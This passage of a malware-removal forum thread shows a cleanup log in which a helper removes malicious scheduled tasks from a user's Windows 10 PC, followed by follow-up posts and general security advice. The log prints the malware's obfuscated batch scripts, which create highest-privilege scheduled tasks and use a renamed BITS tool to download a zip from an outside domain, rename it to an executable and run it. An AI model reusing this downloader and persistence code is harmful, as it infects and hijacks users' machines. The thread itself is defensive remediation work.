Task: {6AFEEB9D-E977-4D4F-945F-B58706D58EA5} - \Microsoft\Windows\UNP\RunCampaignManager -> No File <==== ATTENTION
Task: {7318097E-EEA3-45E5-BFFB-A5D4ADD83F88} - System32\Tasks\RfumFuaEoEEe => C:\Program Files (x86)\Common Files\CyIPiOCiIR.exe
Task: {B06EB407-984B-416E-BC49-D27A42D3E333} - \{6FEFFD84-0D29-0B78-4530-415A173AA131} -> No File <==== ATTENTION
Task: {C0619711-DDB5-4844-B929-881F36A1C478} - System32\Tasks\ouroborosNobbleAbsorbsV2 => rundll32.exe NonrealisticPredefining.dll,main 7 1 <==== ATTENTION
Task: {D72EA3C5-389F-471C-9E8C-99DAD5F11C61} - System32\Tasks\Jasic => C:\Program Files (x86)\Common Files\rYms.bat [2017-09-29] () <==== ATTENTION
Task: C:\WINDOWS\Tasks\{447123AD-7416-1893-A863-7ED1A81B6B4D}.job => C:\Users\OUROBO~1\AppData\Local\447123~1\Sync.exe <==== ATTENTION
Task: C:\WINDOWS\Tasks\{6FEFFD84-0D29-0B78-4530-415A173AA131}.job => C:\Users\OUROBO~1\AppData\Local\Geburo\SYNCVE~1.EXE
 
HKU\S-1-5-21-1787623747-1286628437-3931833605-1001\...\StartupApproved\Run: => "Chromium"
 
EmptyTemp:
*****************
 
Processes closed successfully.
Restore point was successfully created.
 
========= type C:\WINDOWS\SysWOW64\eYyo.bat =========
 
@echo off
c%EvJEau%opy /y "C%YaTrEKy%:\Program Fi%OgeASqig%le%WhkNRO%s (%hUoWTUJyORr%x%YAOBcIaoyDV%86)\Com%usiDOFOEqpk%mon Files\EnAWI%IWNVMH%" "C:\P%PuoduodPtVk%rogram Files (%uYycaNAaiNA%x%uTcryoEEFBUg%86)%ehHYaL%\Comm%IpnyCXoY%o%vHkOMa%n Files\%wIuaqzjomnMiz%E%MrUc%nAWI.bat"
c LUoIiaOyQs%opy /y "C:\WIND%UZAFeWee%OWS\aVPI%oUAZSlUCi%eFZA" "C:\WINDOWS\aVPIeFZA.bat"
s%oyaOuVeO%chtasks /create /tn "aoIYY" /tr "'C:\W%uhOOVNuyXYt%INDOWS\aVPIeFZA.bat%GvFyd%' " /sc ONLO%ZUsiSXoo%GON /delay 0003:0%fYaKZBU%0 /rl highest /f
set Ao%RIiDeU%AOVihobooII=%rAndOM%%RAnDOM%
"C:\WI%IQRZfVdIFoMUa%NDOWS\SysWOW64\iYWHkUpEd.ex%zdAOK%e" /TRansFEr AOEFyIlPo /DownLOad /%tXqUxiaIsv%priOrITy hIgh
rena%VIhaYuEk%me "C:\Users\O%yOlUiyrv%UROBO~1\%YuieDgtkD%Ap%EcUAIczvV%pData\%QIiIOY%Loca%OyPEFS%l\Temp\xeMP%ILWuDyqIoZRi%LYUIaEY.z%pBeTEuA%ip" %AoAOVihobooII%.%IIIaiuN%exe
cmd /c ""C:\Users\%iEeECyU%OUROBO~1\%QwdyOOyOnHuK%AppData\L%AuyaUGiea%ocal\Temp\%AoAOVihobooII%.%VOHnmY%exe" i"
========= End of CMD: =========
 
 
========= type C:\WINDOWS\aVPIeFZA.bat =========
 
start /min cmd /c "C:\Program Files (x86)\Common Files\EnAWI.bat"
exit
========= End of CMD: =========
 
 
========= type "C:\Program Files (x86)\Common Files\EnAWI.bat" =========
 
@%UUjUo%echo off
c%AYYkoAOEtU%opy /y "C%AuUF%:\WINDOWS\S%cURzmVlARh%ysWOW64\eYyo%BtAnAUfoa%" "C:\WIN%OuIY%DOW%TrIyBjdeZUIy%S\%qRGazIUoWteVl%SysWOW64%UHUoeAayP%\eYyo.bat%Iiqa%"
copy /y "%kYVoELeNXmuU%C:\P%MOoa%ro%SduEAd%gram Files (x86)\C%fuRAKR%ommon Files\r%JEEUgAXic%Yms" "C:\Program Files (%AWIIegeEx%x86)\Comm%iaAyYkOAo%on Files\r%FyHi%Yms.bat"
schtasks /create /t%gehIsIUegeHEy%n "Jasic" /tr "'C:\Program Files (x86)\Common Fi%qxyuEbn%les\rYms.bat' " /sc minute /m%kdOX%o 180 /rl high%maYpUGUIUmY%est /f
set M%ziAz%aEAYcWAhnEx=%RAndOm%%RaNdoM%
"C%dbEdiIsHkUtE%:\W%kCetooIOa%INDOWS\SysW%AIlDCAsEQAEi%OW6%MitS%4\iYWHkUpEd.%IYYQo%exe" /traNSfer hYWIOOKMUOU /%vYkqrOAye%DOWNL%oaXuuvhOUJOzI%OAd /%ooiT%prIo%uVUz%RitY HIGH http://fo%IJuuFuYAUxg%r%PayOluKqA%dingw.com/vg7y8r0xxq%Maviiot%x%xsfIEiadH%9.zip "C:\Users\O%eUAU%UROBO~1\AppData\%JOzxIoneHe%Local\Te%OoYDnUPBTY%mp\uHei.%elAXJZSOzOL%zip"%ILkUIEl%
rename "C:\%SPQWSo%Users\OUROBO~1\AppDa%uhIieeNTh%ta\Local\Temp\uHei.zip" %MaEAYcWAhnEx%.e%uizeeU%xe
cmd /c ""%DxiFq%C:\Users\OUROBO~1\AppData\L%yAkGUqJ%ocal%yBNcedIOETdUj%\Temp\%MaEAYcWAhnEx%.exe" i"
========= End of CMD: =========
 
 
========= type "C:\Program Files (x86)\Common Files\rYms.bat" =========
 
start /min cmd /c "C:\WINDOWS\SysWOW64\eYyo.bat"
exit
========= End of CMD: =========
 
C:\Program Files (x86)\Common Files\EnAWI => moved successfully
C:\Program Files (x86)\Common Files\rYms => moved successfully
C:\Program Files (x86)\Common Files\rYms.bat => moved successfully
C:\Program Files (x86)\Common Files\EnAWI.bat => moved successfully
"C:\Program Files (x86)\Common Files\CyIPiOCiIR.exe" => not found
C:\ProgramData\boost_interprocess => moved successfully
C:\ProgramData\ntuser.pol => moved successfully
"C:\Users\OUROBO~1\AppData\Local\447123~1" => not found
"C:\Users\OUROBO~1\AppData\Local\Geburo" => not found
C:\Users\ouroboros\AppData\Local\lptx123456 => moved successfully
C:\Users\ouroboros\AppData\Local\HvpjdXLztn => moved successfully
C:\Users\ouroboros\AppData\Roaming\sp_data.sys => moved successfully
C:\WINDOWS\aVPIeFZA => moved successfully
C:\WINDOWS\aVPIeFZA.bat => moved successfully
C:\WINDOWS\SysWOW64\eYyo => moved successfully
C:\WINDOWS\SysWOW64\eYyo.bat => moved successfully
C:\WINDOWS\SysWOW64\iYWHkUpEd.exe => moved successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Logon\{55A4A116-810E-4EB9-A283-07E1A4D4A39A}" => removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{55A4A116-810E-4EB9-A283-07E1A4D4A39A}" => removed successfully
C:\WINDOWS\System32\Tasks\aoIYY => moved successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\aoIYY" => removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{6AFEEB9D-E977-4D4F-945F-B58706D58EA5}" => removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{6AFEEB9D-E977-4D4F-945F-B58706D58EA5}" => removed successfully
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\UNP\RunCampaignManager => key not found
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{7318097E-EEA3-45E5-BFFB-A5D4ADD83F88}" => removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{7318097E-EEA3-45E5-BFFB-A5D4ADD83F88}" => removed successfully
C:\WINDOWS\System32\Tasks\RfumFuaEoEEe => moved successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\RfumFuaEoEEe" => removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{B06EB407-984B-416E-BC49-D27A42D3E333}" => removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{B06EB407-984B-416E-BC49-D27A42D3E333}" => removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\{6FEFFD84-0D29-0B78-4530-415A173AA131}" => removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Logon\{C0619711-DDB5-4844-B929-881F36A1C478}" => removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{C0619711-DDB5-4844-B929-881F36A1C478}" => removed successfully
C:\WINDOWS\System32\Tasks\ouroborosNobbleAbsorbsV2 => moved successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\ouroborosNobbleAbsorbsV2" => removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{D72EA3C5-389F-471C-9E8C-99DAD5F11C61}" => removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{D72EA3C5-389F-471C-9E8C-99DAD5F11C61}" => removed successfully
C:\WINDOWS\System32\Tasks\Jasic => moved successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Jasic" => removed successfully
C:\WINDOWS\Tasks\{447123AD-7416-1893-A863-7ED1A81B6B4D}.job => moved successfully
C:\WINDOWS\Tasks\{6FEFFD84-0D29-0B78-4530-415A173AA131}.job => moved successfully
"HKU\S-1-5-21-1787623747-1286628437-3931833605-1001\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run\\Chromium" => removed successfully
"HKU\S-1-5-21-1787623747-1286628437-3931833605-1001\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\\Chromium" => not found
 
=========== EmptyTemp: ==========
 
BITS transfer queue => 9199616 B
DOMStore, IE Recovery, AppCache, Feeds Cache, Thumbcache, IconCache => 15931719 B
Java, Flash, Steam htmlcache => 27651806 B
Windows/system/drivers => 959239 B
Edge => 0 B
Chrome => 444680241 B
Firefox => 0 B
Opera => 0 B
 
Temp, IE cache, history, cookies, recent:
Default => 0 B
Users => 0 B
ProgramData => 0 B
Public => 0 B
systemprofile => 0 B
systemprofile32 => 0 B
LocalService => 0 B
NetworkService => 2986 B
ouroboros => 15617521 B
Visitor => 0 B
 
RecycleBin => 0 B
EmptyTemp: => 490.2 MB temporary data Removed.
 
================================
 
 
The system needed a reboot.
 
==== End of Fixlog 00:35:00 ====


#8 Aura

Aura

    Bleepin' Special Ops


  • Malware Response Team
  • 19,634 posts
  • OFFLINE
  •  
  • Gender:Male
  • Local time:10:26 AM

Posted 05 January 2018 - 11:53 AM

Got your PM, thank you :) Now, do you still get the CMD prompts on startup?

unite_blue.png
Security Administrator | Sysnative Windows Update Senior Analyst | Malware Hunter | @SecurityAura
My timezone UTC-05:00 (East. Coast). If I didn't reply to you within 48 hours, please send me a PM.


#9 oneiric

oneiric
  • Topic Starter

  • Members
  • 9 posts
  • OFFLINE
  •  
  • Local time:10:26 PM

Posted 05 January 2018 - 12:33 PM

I didn't get any cmd prompts, I'll update you if it comes up again.

 

Thanks again Yoan, hopefully it's all fixed. 



#10 Aura

Aura

    Bleepin' Special Ops


  • Malware Response Team
  • 19,634 posts
  • OFFLINE
  •  
  • Gender:Male
  • Local time:10:26 AM

Posted 06 January 2018 - 09:53 AM

Got your PM, thank you :)

Were there any other issues to address, or that was it?

unite_blue.png
Security Administrator | Sysnative Windows Update Senior Analyst | Malware Hunter | @SecurityAura
My timezone UTC-05:00 (East. Coast). If I didn't reply to you within 48 hours, please send me a PM.


#11 oneiric

oneiric
  • Topic Starter

  • Members
  • 9 posts
  • OFFLINE
  •  
  • Local time:10:26 PM

Posted 07 January 2018 - 08:55 PM

It's been three days and I haven't encountered any cmd pop ups anymore. I think its fixed.



#12 Aura

Aura

    Bleepin' Special Ops


  • Malware Response Team
  • 19,634 posts
  • OFFLINE
  •  
  • Gender:Male
  • Local time:10:26 AM

Posted 08 January 2018 - 01:02 PM

Awesome!

Since there are no signs of infection anymore in your logs, and you just told me that there are no more issues left to address, I guess we're done here. We'll wrap it up by running DelFix to delete the tools and logs that were used in this clean-up.

BWuhenj.pngDelFix
Follow the instructions below to download and execute DelFix.
  • Download DelFix and move the executable to your Desktop;
  • Right-click on DelFix.exe and select Spcusrh.pngRun as Administrator (for Windows Vista, 7, 8, 8.1 and 10 users);
  • Check the following options :
    • Activate UAC;
    • Remove disinfection tools;
    • Create registry backup;
    • Purge system restore;
    • Reset system settings;
  • Once all the options mentionned above are checked, click on Run;
  • After DelFix is done running, a log will open. Please copy/paste the content of the output log in your next reply;
Qt25440.pngTips, tricks, advice and recommendations

Now it's time to give you some tips, tricks, advice and recommendations on how to protect your system and prevent you from being infected in the future. This is where I'll explain basic security measures that you should take to protect and harden your system, and also make sure it stays as safe and secure as possible against hackers and malware. You are free to ignore the recommendations listed below, although I obviously do not recommend it. If you have any questions about one of the points covered in the speech below, feel free to ask me your questions here directly so I can answer them and guide you.

Windows Updates

Keeping Windows up to date is one of the first steps in having a safe and secure system. The Security Updates that Windows receives are meant to fix exploits and flaws in it that makes it more secure and not exploitable by hackers. In order to do that, you should always install the Security Updates, known as "Important Updates" on your Windows system. These updates are released on the second Tuesday of every month, but some are also released before if they are emergency/critical Security Updates. Let's make sure that you have all your Important Updates and Recommended Updates installed and that your Windows Updates are set to be installed automatically.Keeping your programs up-to-date

Like keeping Windows updated, keeping your installed programs up-to-date is another important step in having a safe and secure system. Outdated programs can be exploited by hackers and malware to infect a system and take it over. This is especially true today with the rise of Exploit Kits which is one of the biggest attack vectors to distribute malware. Therefore, you should always keep vulnerable programs like Adobe Flash Player, Adobe Shockwave Player, Java, Silverlight, etc. updated to their most recent version (even better, you don't have to install them if you don't use them). Programs like eLDnJfI.pngSecuniaPSI and y5YE7At.pngHeimdal Free will scan your system for outdated programs, and help you identify them, as well as update them.

Antivirus, Antimalware, Firewall and Anti-Exploit/Ransomware

Having a decent security setup (led by an Antivirus) is the most crucial step to protect a system. These programs are a layer of defence that will prevent a system from being infected, or if it somehow ends up infected, help mitigate the infection and remediate it. Ideally, you should have on your system one Antivirus (never more than one installed at the time), one Antimalware (you can install multiple of these, assuming they do not conflict with each other and the other security programs installed), one Firewall and if you wish, one Anti-Exploit and/or Anti-Ransomware (since Ransomware are currently the most dangerous threat around and it can hit anywhere). Here are a few programs worth checking out if you don't have one yet.

Note: The programs listed below are all free to use or they have some sort of trial. Some of them have a paid version that provides more features, while a lot of other good programs only have a paid version but aren't listed there (such as Kaspersky and ESET Antivirus products).

AntivirusAntimalwareFirewall
Starting in Windows Vista, the Windows Firewall greatly improved and will satisfy the needs of most users. If you do not have an Internet Suite Antivirus program (which includes a firewall) and you want to use a 3rd party firewall, you can consider the options below.
  • 7p3JzTS.pngGlassWire - Has both a free and paid version (with different packages);
  • MQIMh6k.pngWindows Firewall Control - Gives you more control over your Windows Firewall;
  • 5RXGshU.pngTinyWall - Lightweight firewall implementing the Windows Firewall and giving you more control over it;
Anti-Exploit/Anti-RansomwareWeb Browsers and Web Browsing

Web Browsers could be considered as the closest door between a malware and your system. This is where most malware goes through to infect a system, and therefore it should be the program(s) you want to secure the most. There are two ways of going about it: hardening your web browser via extensions, and having good browsing habits.

Hardening your web browser means to install extensions that will help it protect itself (and your system on the same occasion) against Exploit Kits, MiTM attacks, etc. but also you at the same time. Here are a few extensions that I recommend you to install.
  • uBlock Origin: Efficient multi-purpose blocker that is lightweight on RAM and CPU usage (Google Chrome and Mozilla Firefox, called uBlock on Opera);
  • HTTPS Everywhere: Extension that converts your HTTP (unencrypted) requests to HTTPS (encrypted) ones (Google Chrome, Mozilla Firefox and Opera);
  • Web of Trust: Website reputation, rating and review extension that will help you quickly identify bad and suspicious sites from good ones (every web browsers);
  • NoScript: NoScript is a script blocker (Java, Flash, JavaScript, etc.) for Mozilla Firefox and Firefox-based browsers (Mozilla Firefox and Firefox-based web browsers);
  • uMatrix: For advanced users, a point and click matrix-like extensions that allow you to control requests done on a webpage (based on source, destination and type) (Google Chrome, Mozilla Firefox and Opera);
  • LastPass: Secure password manager allowing you to create, manage, and use passwords you save in your LastPass account (every web browser);
As for safe browsing habits, you can find tons of guides, tutorials, articles, etc. online that will highlight the basics you need to follow (only visit websites you trust, do not click on ads, do not download files from untrusted sources, use a password manager, always verify the URL of a website and make sure it's correctly typed, etc.), and even what you can do if you want to take it a step further (create a fake email address for spam emails, browse the web in a privacy mode, etc.). Here are a few:As you can see, there are plenty of resources out there. Simply Googling "good browsing habits" or "safe browsing habits" should allow you to find a lot of them.

Other recommendations

Even if you follow every recommendation that I listed here, in the end, it's also your job to be careful when browsing the web and downloading files if you don't want to get infected. Therefore, if you use your brain (common sense) when browsing the web, downloading programs and files, etc., you have far less chances to get infected by a malware. If for example you're not sure if a website is legitimate or not, or if a file is safe to download and execute, or if a program looks "too good" to be free, I suggest you to avoid going to that website, downloading that file or using that program.

Here are a few guides, tutorials, articles, etc. that you could read in order to learn more about computer protection and security to improve your current computer protection setup but also improve your good web browsing and computer usage practices :gRvSooB.pngThe End!

And that's it! Now that you know more about how to protect your computer and secure it, you're good to go back to your online activities, but in a safe and secure way! You are also free to stay on the forums and ask for help in different topics if you ever need to. Just make sure that you post your question/issue in the right section to get the best assistance possible. And if you ever get infected again (which I hope you wont!), you can always comeback in this section to get another checkup with one of our trained malware removal member.

Do you have any questions before I close this thread? :)

unite_blue.png
Security Administrator | Sysnative Windows Update Senior Analyst | Malware Hunter | @SecurityAura
My timezone UTC-05:00 (East. Coast). If I didn't reply to you within 48 hours, please send me a PM.


#13 oneiric

oneiric
  • Topic Starter

  • Members
  • 9 posts
  • OFFLINE
  •  
  • Local time:10:26 PM

Posted 10 January 2018 - 09:31 AM

# DelFix v1.013 - Logfile created 10/01/2018 at 22:31:16
# Updated 17/04/2016 by Xplode
# Username : ouroboros - ENJAY
# Operating System : Windows 10 Home Single Language  (64 bits)
 
~ Activating UAC ... OK
 
~ Removing disinfection tools ...
 
Deleted : C:\FRST
Deleted : C:\AdwCleaner
Deleted : C:\Users\ouroboros\Desktop\Addition.txt
Deleted : C:\Users\ouroboros\Desktop\Fixlog.txt
Deleted : C:\Users\ouroboros\Desktop\FRST.txt
Deleted : C:\Users\ouroboros\Desktop\FRST64.exe
Deleted : C:\Users\ouroboros\Downloads\adwcleaner_7.0.6.0.exe
 
~ Creating registry backup ... OK
 
~ Cleaning system restore ...
 
Deleted : RP #24 [Scheduled Checkpoint | 01/07/2018 06:16:56]
 
New restore point created !
 
~ Resetting system settings ... OK
 
########## - EOF - ##########


#14 Aura

Aura

    Bleepin' Special Ops


  • Malware Response Team
  • 19,634 posts
  • OFFLINE
  •  
  • Gender:Male
  • Local time:10:26 AM

Posted 10 January 2018 - 01:46 PM

Good! Any questions before I close your thread? :)

unite_blue.png
Security Administrator | Sysnative Windows Update Senior Analyst | Malware Hunter | @SecurityAura
My timezone UTC-05:00 (East. Coast). If I didn't reply to you within 48 hours, please send me a PM.


#15 Aura

Aura

    Bleepin' Special Ops


  • Malware Response Team
  • 19,634 posts
  • OFFLINE
  •  
  • Gender:Male
  • Local time:10:26 AM

Posted 12 January 2018 - 08:20 AM

It appears that this issue is resolved, therefore I am closing the topic. If that is not the case and you need or wish to continue with this topic, please send me or any Moderator a Personal Message (PM) that you would like this topic re-opened.

unite_blue.png
Security Administrator | Sysnative Windows Update Senior Analyst | Malware Hunter | @SecurityAura
My timezone UTC-05:00 (East. Coast). If I didn't reply to you within 48 hours, please send me a PM.





0 user(s) are reading this topic

0 members, 0 guests, 0 anonymous users